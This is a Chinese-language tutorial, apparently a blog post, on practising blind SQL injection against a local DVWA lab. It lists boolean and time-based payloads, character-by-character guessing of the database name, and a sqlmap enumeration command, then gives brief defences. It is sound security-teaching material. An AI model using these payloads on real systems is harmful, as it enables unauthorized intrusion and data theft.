SQL 盲注(Blind SQL Injection)

一、🧠 什么是 SQL 盲注?

SQL 盲注(Blind SQL Injection) 是指 页面没有显示明显的报错或数据返回,但仍然可以通过一些技巧 推断出数据库中的信息。

常见的盲注类型有两种:

  • 布尔型盲注(Boolean-based Blind):页面根据条件判断是否显示不同内容。
  • 时间型盲注(Time-based Blind):页面根据条件判断是否延迟响应。

✅ 环境准备

1.拉取 DVWA 镜像并运行:docker run --rm -it -p 8080:80 vulnerables/web-dvwa

打开浏览器访问:

http://localhost:8080

2.默认登录账号:

  • 用户名:admin
  • 密码:password

3.设置数据库(第一次登录会提示):

点击左侧的 "DVWA Setup "(或顶部菜单),然后点击页面中的 "Create / Reset Database" 按钮。

4.成功后返回 DVWA 首页。

5.在 DVWA 中选择了 SQL Injection (Blind) 模块。

你访问的 URL 结构类似:

php 复制代码
http://localhost/vulnerabilities/sqli_blind/?id=1&Submit=Submit

二、🧪 初级布尔型盲注练习

🎯 目标:判断是否可以控制 SQL 语句
测试 1:恒为真的条件

php 复制代码
1' AND 1=1 -- 

✅ 页面应显示:User ID exists in the database.

测试 2:恒为假的条件

php 复制代码
1' AND 1=2 -- 

❌ 页面应显示:User ID is MISSING from the database.

🔍 如果你能通过页面的不同响应判断 true/false,那说明布尔盲注是可行的。

三、🧪 中级练习:猜数据库名称长度

php 复制代码
1' AND LENGTH(database())=4 -- 

观察页面返回:如果返回 "存在",说明数据库名长度是 4。否则你换成 5、6、3 、去试。

四、🧪 高级练习:逐字符猜数据库名

php 复制代码
1' AND SUBSTRING(database(),1,1)='d' -- 

然后依次替换字符:

php 复制代码
1' AND SUBSTRING(database(),1,1)='a' -- 
1' AND SUBSTRING(database(),1,1)='b' -- 
...

直到页面显示"User ID exists",说明猜对了第一个字符。

继续 SUBSTRING(database(),2,1),即可推完整名。

五、🕓 时间盲注测试(可选)

php 复制代码
1' AND IF(1=1, SLEEP(5), 0) -- 

页面会延迟 5 秒再返回。

php 复制代码
1' AND IF(1=2, SLEEP(5), 0) -- 

页面立即返回(说明条件为假)。

六、❓是否需要自动化工具?

可以使用 sqlmap(测试id参数是否存在布尔型盲注漏洞,如果发现注入点,将尝试列出服务器上的所有数据库):

php 复制代码
sqlmap -u "http://localhost/vulnerabilities/sqli_blind/?id=1&Submit=Submit" \
--cookie="security=low; PHPSESSID=你的Session" \
--technique=B --dbs

七、🔐如何防御 SQL 盲注?

  • 使用参数化查询(PreparedStatement)
  • 对用户输入严格过滤、校验类型
  • 最小权限原则,限制数据库账户权限
  • WAF 检测 SQL 注入行为
相关推荐
鹧鸪云光伏与储能软件开发26 分钟前
投资储能项目能赚多少钱?小程序帮你测算
运维·数据库·小程序·光伏·光伏设计软件·光伏设计
2301_779503762 小时前
MySQL主从同步--主从复制进阶
数据库·mysql
beijingliushao2 小时前
58-正则表达式
数据库·python·mysql·正则表达式
诗句藏于尽头3 小时前
DJANGO后端服务启动报错及解决
数据库·笔记·django
手握风云-3 小时前
MySQL数据库精研之旅第十五期:索引的 “潜规则”(下)
数据库
失散133 小时前
分布式专题——1.1 Redis单机、主从、哨兵、集群部署
java·数据库·redis·分布式·架构
2301_779503764 小时前
MySQL集群高可用架构---mysql高可用之组复制 (MGR)
数据库·mysql·架构
Hello.Reader4 小时前
一文通关 Proto3完整语法与工程实践
java·linux·数据库·proto3
c萱4 小时前
软件测试错题笔记
软件测试·数据库·笔记·测试工具·oracle·测试用例
長琹5 小时前
AES加密算法详细加密步骤代码实现--身份证号码加解密系统
网络·数据库·人工智能·python·密码学